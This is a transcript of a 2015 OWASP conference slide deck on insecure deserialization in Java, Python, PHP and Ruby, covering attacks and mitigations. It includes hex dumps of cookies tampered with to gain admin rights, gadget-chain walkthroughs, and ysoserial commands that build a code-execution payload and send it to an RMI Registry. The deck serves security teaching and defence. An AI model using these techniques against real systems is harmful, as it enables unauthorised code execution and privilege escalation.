SlideShare a Scribd company logo

OWASP AppSecCali 2015 - Marshalling Pickles

Download as PPTX, PDF
Christopher Frohoff, profile picture
Christopher Frohoff

The document discusses object serialization vulnerabilities and the potential risks associated with deserializing objects, emphasizing that developers often place undue trust in serialization processes. It reviews various serialization formats, explores example exploitations, and suggests mitigation techniques. Additionally, it includes demonstrations of serialized object manipulation through practical examples and tools designed to analyze such vulnerabilities.

Technology
1 of 84
Downloaded 1,425 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
Most read
51
Most read
52
53
54
55
56
57
58
59
60
61
62
Most read
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
Marshalling Pickles how deserializing objects can ruin your day Gabriel Lawrence (@gebl) and Chris Frohoff (@frohoff)
2 Survey of object serialization vulnerabilities Example exploitation − Sample Apps − Novel Vectors − New Tools Mitigation techniques Talk Goals *Did our best to find previous research and give credit/references. Please let us know if we missed any.
3 snapshots one or more “live”, in-memory objects into a flat, serial stream of data that can be stored or transmitted for reconstitution and use by a different process or the same process at some point Formats − Binary: Java Serialization, Ruby Marshal, Protobuf, Thrift, Avro, MS-NRBF, Android Binder/Parcel, IIOP − Hybrid/Other: PHP Serialization, Python pickle, Binary XML/JSON − Readable: XML, JSON, YAML Platform/Formats may have multiple implementations and/or sub-formats Serializing Objects a.k.a. “marshaling”, “pickling”, “freezing”, ”flattening”
4 Remote/Interprocess Communication (RPC/IPC) − Communicating data to different system/process − Wire protocols, web services, message brokers Caching/Persistence − Communicating data to process’ future self − Databases, cache servers, file systems Tokens − Communicating data to different system/process and back − HTTP cookies, HTML form parameters, API auth tokens Purposes and Mediums Why and where
5 Developers trust it too much and make assumptions − Assume storage/transmission mediums are protected − Assume binary formats are opaque − Assume token authentication can’t be defeated − Assume serialization is “safe“ We abuse trust and defy assumptions for a living But why do we care?
6 “Any big binary blob needs to be investigated as potential object serialization”
7 Demos
8 THESE DEMOS ARE FICTIONAL DRAMATIZATIONS BASED ON TRUE STORIES AND REAL EVENTS. ALL NAMES HAVE BEEN CHANGED TO PROTECT THE GUILTY. * * We have actually seen this stuff in assessments
9 Application State Manipulation
10 What’s that? Base64 encoded serialized Java object as a cookie value
11 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Serialized Java Object
12 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Class Description
13 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Data in object
14 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0174 0005 ng/String;xp.t.. 0000060: 6368 7269 73 chris Data in object (Manipulated)
15 Screen Shots – Normal Login https://bitbucket.org/gebl/appseccali-cookie
16 Screen Shots – Manipulated to be Admin and Chris https://bitbucket.org/gebl/appseccali-cookie
17 By default, pickle data format uses an ASCII representation − Protocol version 0: ASCII protocol − Protocol version 1: Old binary format − Protocol version 2: New binary format Good write up on the formats: − http://spootnik.org/entries/2014/04/05_diving-into-the-python-pickle-format.html Python Pickle in Cookie
18 What’s that? Base64 encoded pickled Python object
19 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. Pickled Python Object
20 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. Admin Property
21 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. User Property
22 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3031 0a73 5327 7573 6572 270a 7033 .I01.sS'user'.p3 0000020: 0a56 6368 7269 730a 7034 0a73 2e .Vchris.p4.s. Properties (Manipulated)
23 Screen Shots – Normal Login https://bitbucket.org/gebl/appseccali-inapickle
24 Screen Shots – Manipulated to be Admin and Chris https://bitbucket.org/gebl/appseccali-inapickle
25 Application Logic Manipulation
26 PHP Serialization Format Basic types: − <type specifier>:<data>; Arrays: − a:<count>:{<key>:<value>,…} Two ways for Objects: − “O” just like array − Custom defined by developer http://www.phpinternalsbook.com/classes_objects/serialization.html
27 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. PHP Serialized Object
28 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Class Name
29 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. IsAdmin Property
30 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Plan Property (Filename)
31 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Username Property
32 Screen Shot - Normal https://bitbucket.org/gebl/appseccali-php
33 Enumerating Services Oh, look… memcache!
34 Memcache Tamper Script https://bitbucket.org/gebl/appseccali-php
35 Executing Script https://bitbucket.org/gebl/appseccali-php
36 Screen Shot – Memcache changed https://bitbucket.org/gebl/appseccali-php
37 Expression Language (EL) allows the use of simple expressions to: − Dynamically read application data − Dynamically write application data − Invoke arbitrary methods Java Server Faces http://www.developer.am/interesting/jsp-application-lifecycle/
38 <h:form> <qcom:userheader dispname="#{loginBean.name}"></qcom:userheader> <ui:fragment rendered="#{loginBean.isadmin}"> <p> you are an admin!</p> </ui:fragment> <h:panelGrid columns="2"> <h:outputText value="Update Login Name"></h:outputText> <h:inputText value="#{loginBean.name}"></h:inputText> </h:panelGrid> <h:commandButton value="Update" action="update"></h:commandButton> </h:form> JSP Source https://bitbucket.org/gebl/appseccali-jsf-el
39 New Tool: View State Messer! https://bitbucket.org/gebl/viewstatemesser
40 java -jar ViewStateMesser.jar dump Array Items: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 1338668845 Fields: _children: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 159413332 Fields: _children: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 1028214719 Fields: _children: com.qualcomm.isrm.jsf.NullReference@1ddc4ec2 _componentClass: javax.faces.component.html.HtmlOutputLabel _componentId: Dump of ViewState https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
41 org.apache.myfaces.view.facelets.el.ContextAwareTagValueExpressionUEL 935044096 Fields: Custom: org.apache.el.ValueExpressionImpl 396180261 Fields: Custom: 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 00 11 23 7b 6c 6f 67 69 6e 42 65 61 6e 2e 6e 61 6d 65 7d 00 10 6a 61 76 61 2e 6c 61 6e 67 _ _ # { l o g i n B e a n . n a m e } _ _ j a v a . l a n g 2e 4f 62 6a 65 63 74 . O b j e c t NULL NULL Dump of ViewState https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
42 Usage: − java -jar ViewStateMesser.jar "#{loginBean.isadmin}“ Finds all org.apache.el.ValueExpressionImpl and replaces the EL with the supplied argument. Similar to Synacktiv InYourFace tool Changing the ViewState EL https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
43
44 Arbitrary Code Execution
45 Code reuse attack (a la ROP) Uses “gadget” classes already in scope of application Create chain of instances and method invocations − Start with “kick-off” gadget that executes during or after deserialization − End in “sink” gadget that executes arbitrary code/commands − Use other gadgets to chain start gadget execution to end gadget Serialize chain and send to vulnerable deserialization in application Chain executed in application during/after deserialization Profit Property-Oriented Programming / Object Injection Earliest POP research we found was by Stefan Esser (@i0n1c), “Utilizing Code Reuse/ROP in PHP Application Exploits"
46 Rube-Goldberg-esque Gadget chains are generally carrier-medium, application, and OS/platform agnostic − Relies only on code available to application − Not necessarily code used by application Gadget Classes − Target common libraries/frameworks. Library sprawl FTW. − “Proxy” gadgets versatile − Deserialization hook methods for self-execution Gadget hunting and chain construction is an art − Can be frustrating and tedious − Rich IDEs help, but custom tools are better − https://github.com/frohoff/inspector-gadget (out of scope for talk) Property-Oriented Programming / Object Injection
47 Target Ruby’s ERB templating system Use Rails utility classes in chain Chain from Rails YAML exploit − YAML version required addition gadgets Executed by Rails by accessing session object after deserialization A Ruby + Rails Gadget Chain Chain discovered by Charlie Somerville (@charliesome) as part of a Rails YAML exploit
48 Code Execution via Ruby Marshal Exposed redis listener https://github.com/frohoff/appseccali-rails-redis https://github.com/frohoff/rails_exploits
49
50 A Simple Java Gadget Chain ObjectInputStream.readObject() “calc.exe”
51 Time-Lapse of Deserialization ObjectInputStream.readObject() called ObjectInputStream readObject() defaultReadObject()
52 Time-Lapse of Deserialization CacheManager instance allocated CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
53 Time-Lapse of Deserialization CacheManager.readObject() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
54 Time-Lapse of Deserialization ObjectInputStream.defaultReadObject() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
55 Time-Lapse of Deserialization CommandTask instance allocated and referenced by CacheManager.initHook field CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run()
56 Time-Lapse of Deserialization CommandTask.run() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run()
57 Time-Lapse of Deserialization Runtime.exec() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run() Runtime exec() “calc.exe”
58 Time-Lapse of Deserialization Target program run CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run() Runtime exec() “calc.exe”
59 A Java + Commons- Collections Gadget Chain
60 Target java.lang.Runtime.exec(String cmd) Uses gadgets in JDK and Apache Commons-Collections library Self-executing during deserialization − Executes before object returned to caller A Java + Commons-Collections Gadget Chain Similar POP techniques previously applied to Java Serialization by Wouter Coekaerts (@WouterCoekaerts) and implemented by Alvaro Muñoz (@pwntester)
61 Call Chain
62 Gadget Chain Construction Code and Call Tree
63 New Tool: ysoserial https://github.com/frohoff/ysoserial
64 Tool and utilities for generating Java deserialization exploit payloads Contains multiple gadget chain payloads − CommonsCollections1 (commons-collections) − CommonsCollections2 (commons-collections4) − Spring1 (spring-core, spring-beans) − Groovy1 (groovy) Create payload to execute calc.exe using CommonsCollections1 chain: $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd | head -3 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe > payload.bin Send exploit payload to RMI Registry listener: $ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe ysoserial: Usage info
65 Code Execution via Java Serializable JSF ViewState form parameters deserialized without authentication
66 Code Execution via Java Serializable JSF (MyFaces) ViewState form parameters deserialized
67
68 Code Execution via Java Serializable RMI Regisitry deserializing untrusted data from remoting protocol stream
69 RMIRegistry https://github.com/frohoff/appseccali-java
70
71 General − Can only use classes available to application Java Serialization − ClassLoader of vulnerable code vs gadgets − Gadget classes must implement Serializable/Externalizable − Library/class version differences − Static type constraints Web frameworks − Many (but not all) now have sane defaults − Sign (and sometimes encrypt) client tokens: session cookies, viewstate, etc. Property Oriented Programming: Limitations & Caveats
72 Mitigation
73 Avoid open-ended (de)serialization when possible − If the serialization includes a class name, it’s probably bad Simple format and/or data types − Strings, Numbers, Arrays, Maps, etc. Manually serialize complex objects Keep session state on the server when possible − Beware of lateral attacks! (memcached, redis, database, etc.) Abstenence Avoid magic
74 Whitelist/Blacklist classes Constrain to expected type Statically typed object structure Schema-enforced formats Difficult without library support Restrict Deserialization Code defensively
75 Java − Default ObjectInputStream will deserialize any Serializable class − Class Blacklisting/Whitelisting − Subclass ObjectInputStream − override resolveClass() to allow/disallow classes − A bit of a hack − http://www.ibm.com/developerworks/library/se-lookahead/ Ruby − Default Marshal behavior deserializes any class − No obvious clean way to change − Maybe monkey patch Marshal hook methods on Object class (untested) PHP −  Restrict Deserialization
76 Python − Default unpickler will import any class − Pickle − Subclass Unpickler, override load_global − Load_global push safe classes onto pickler’s stack or raise an error − HACK according to the docs! − Cpickle − Set find_global to a function − Function takes module and class − Create on object or raise an error − https://docs.python.org/2/library/pickle.html − Section 11.1.6 Restrict Deserialization
77 Encryption != Authentication Authenticate channels − TLS Client Certs, SASL, DB/Cache/Broker credentials Authenticate content − HMAC or Authenticated Encryption with secret key Must be verified pre-deserialization! Pro-tip: Don’t leak crypto keys! Authenticate Trust Verify
78 Strict firewall rules for deserializing listeners Sandboxing/Hardening − Java SecurityManager − RestrictedPython − php.ini security settings − AppArmor − SELinux Security-in-depth Assume breach of defenses
79 Vulnerability is in doing unsafe deserialization, not in having gadgets available More will be always found Transitive dependencies cause library sprawl Cross-library gadget chains Auto-detection difficult Gadget Whack-a-Mole Don’t rely on this!
80 Find more unsafe deserialization Find more gadgets/chains Gadget finding tool improvements Explore mediums, platforms, formats, implementations Future Work (including for you) Go forth and pwn all the things
81 Stefan Esser, 2009/11/1, Shocking News in PHP Exploitation − https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra09_fu_esser_php_exploits1.pdf David Byrne, Rohini Sulatycki, 2010/6/21, Beware of Serialized GUI Objects Bearing Data − https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf Stefan Esser, 2010/7/29, Utilizing Code Reuse/ROP in PHP Application Exploits − https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf Wouter Coekaerts, 2011/9/9, Spring Vulnerabilities − http://wouter.coekaerts.be/2011/spring-vulnerabilities Charlie Sommerville, 2013/1/10, Rails 3.2.10 Remote Code Execution − https://github.com/charliesome/charlie.bz/blob/master/posts/rails-3.2.10-remote-code-execution.md Arseniy Reutov, 2013/5/28, PHP Object Injection Revisited − https://prezi.com/5hif_vurb56p/php-object-injection-revisited/ Stephen Coty, 2013/6/14, Writing Exploits for Exotic Bug Classes: unserialize() − https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes/ Ben Murphy, 2013/6/23, Property Oriented Programming Applied to Ruby − http://slides.com/benmurphy/property-oriented-programming#/ Robert Heaton, 2013/7/22, How to hack a Rails app using its secret_token − http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ Dinis Cruz, 2013/8/6, Using XMLDecoder to execute server-side Java Code on an Restlet application − http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html Past Work / References
82 Abraham Kang, Dinis Cruz, Alvaro Munoz, 2013/8/6, RESTing on your laurels will get you pwned − http://www.slideshare.net/DinisCruz/res-ting-on-your-laurels-will-get-you-powned4-3 Tom Van Goethem, 2013/9/11, WordPress < 3.6.1 PHP Object Injection − https://vagosec.org/2013/09/wordpress-php-object-injection/ David Jorm, 2013/11/20, Java Deserialization Flaws: Part 1, Binary Deserialization − https://securityblog.redhat.com/2013/11/20/java-deserialization-flaws-part-1-binary-deserialization/ Alvaro Munoz, 2013/12/16, CVE-2011-2894: Deserialization Spring RCE − http://pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/ Dinis Cruz, 2013/12/22, XStream "Remote Code Execution" exploit on code from "Standard way to serialize and deserialize Objects with XStream" article, − http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html David Jorm, 2014/1/23, Java deserialization flaws: Part 2, XML deserialization − https://securityblog.redhat.com/2014/01/23/java-deserialization-flaws-part-2-xml-deserialization/ Johannes Dahse, Nikolai Krein, Thorsten Holz, 2014/11/3, Code Reuse Attacks in PHP: Automated POP Chain Generation − https://websec.files.wordpress.com/2010/11/rips_ccs.pdf − http://syssec.rub.de/media/emma/veroeffentlichungen/2014/09/10/POPChainGeneration-CCS14.pdf Renaud Dubourguais, Nicolas Collignon, JSF ViewState upside-down − http://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf Past Work / References
83 Sample Apps − https://bitbucket.org/gebl/appseccali-cookie − https://bitbucket.org/gebl/appseccali-inapickle − https://bitbucket.org/gebl/appseccali-php − https://bitbucket.org/gebl/appseccali-jsf-el − https://github.com/frohoff/appseccali-rails-redis − https://github.com/frohoff/appseccali-java Tools − https://bitbucket.org/gebl/viewstatemesser − https://github.com/frohoff/rails_exploits − https://github.com/frohoff/ysoserial − https://github.com/frohoff/inspector-gadget Sample Apps and Tools
84 For more information on Qualcomm, visit us at: www.qualcomm.com & www.qualcomm.com/blog Qualcomm is a trademark of Qualcomm Incorporated, registered in the United States and other countries. Other products and brand names may be trademarks or registered trademarks of their respective owners Thank you Follow us on: Gabe Lawrence gabe@qualcomm.com @gebl Chris Frohoff cfrohoff@qualcomm.com @frohoff

More Related Content

PDF
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
PDF
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
PDF
XSS Magic tricks
GarethHeyes
 
PDF
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
PDF
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
PPTX
Security Code Review 101
Paul Ionescu
 
PDF
Securing AEM webapps by hacking them
Mikhail Egorov
 
PPTX
The OWASP Zed Attack Proxy
Aditya Gupta
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
XSS Magic tricks
GarethHeyes
 
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Security Code Review 101
Paul Ionescu
 
Securing AEM webapps by hacking them
Mikhail Egorov
 
The OWASP Zed Attack Proxy
Aditya Gupta
 

What's hot (20)

PDF
Exploiting Deserialization Vulnerabilities in Java
CODE WHITE GmbH
 
PDF
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
PDF
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
joaomatosf_
 
PDF
The innerHTML Apocalypse
Mario Heiderich
 
PDF
Black Hat EU 2010 - Attacking Java Serialized Communication
msaindane
 
PDF
Pentesting GraphQL Applications
Neelu Tripathy
 
PDF
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
PPTX
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
PDF
Defending against Java Deserialization Vulnerabilities
Luca Carettoni
 
PDF
PostgreSQL Replication High Availability Methods
Mydbops
 
PPTX
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
PDF
PUC SE Day 2019 - SpringBoot
Josué Neis
 
PPTX
XXE: How to become a Jedi
Yaroslav Babin
 
PDF
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
HackIT Ukraine
 
PDF
PHP unserialization vulnerabilities: What are we missing?
Sam Thomas
 
PPTX
Node js Introduction
sanskriti agarwal
 
PDF
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
PDF
React Server Side Rendering with Next.js
Jamie Barton 👨🏻‍💻
 
PPTX
Attacking thru HTTP Host header
Sergey Belov
 
PDF
Introduction to JWT and How to integrate with Spring Security
Bruno Henrique Rother
 
Exploiting Deserialization Vulnerabilities in Java
CODE WHITE GmbH
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
joaomatosf_
 
The innerHTML Apocalypse
Mario Heiderich
 
Black Hat EU 2010 - Attacking Java Serialized Communication
msaindane
 
Pentesting GraphQL Applications
Neelu Tripathy
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
Defending against Java Deserialization Vulnerabilities
Luca Carettoni
 
PostgreSQL Replication High Availability Methods
Mydbops
 
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
PUC SE Day 2019 - SpringBoot
Josué Neis
 
XXE: How to become a Jedi
Yaroslav Babin
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
HackIT Ukraine
 
PHP unserialization vulnerabilities: What are we missing?
Sam Thomas
 
Node js Introduction
sanskriti agarwal
 
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
React Server Side Rendering with Next.js
Jamie Barton 👨🏻‍💻
 
Attacking thru HTTP Host header
Sergey Belov
 
Introduction to JWT and How to integrate with Spring Security
Bruno Henrique Rother
 
Ad

Similar to OWASP AppSecCali 2015 - Marshalling Pickles (20)

PPTX
Serial Killers - or Deserialization for fun and profit
blaufish
 
PDF
How Eggxactly Insecure Deserialization Exploit works(1).pdf
NullHyderabad
 
PDF
When Crypto Attacks! (Yahoo 2009)
Nate Lawson
 
PDF
BERserk: New RSA Signature Forgery Attack
Alex Matrosov
 
PPTX
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Ontico
 
PDF
Marat-Slides
Marat Vyshegorodtsev
 
PDF
3
Marat Vyshegorodtsev
 
PDF
Crypto Strikes Back! (Google 2009)
Nate Lawson
 
PDF
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
CODE WHITE GmbH
 
PDF
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
CODE WHITE GmbH
 
PPTX
Fixing the Java Serialization Mess
Salesforce Engineering
 
PPTX
Auscert 2022 - log4shell and history of Java deserialisation RCE
David Jorm
 
PDF
Breaking .net through serialization
Net Drive
 
PDF
Cigital-ExploitingJava
Travis Biehn
 
PDF
A CTF Hackers Toolbox
Stefan
 
PDF
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Checkmarx
 
PPTX
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Dor Tumarkin
 
PPT
IBM Global Security Kit as a Cryptographic layer for IBM middleware
Oktawian Powazka
 
PDF
Java Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Tal Melamed
 
PDF
[Wroclaw #7] Why So Serial?
OWASP
 
Serial Killers - or Deserialization for fun and profit
blaufish
 
How Eggxactly Insecure Deserialization Exploit works(1).pdf
NullHyderabad
 
When Crypto Attacks! (Yahoo 2009)
Nate Lawson
 
BERserk: New RSA Signature Forgery Attack
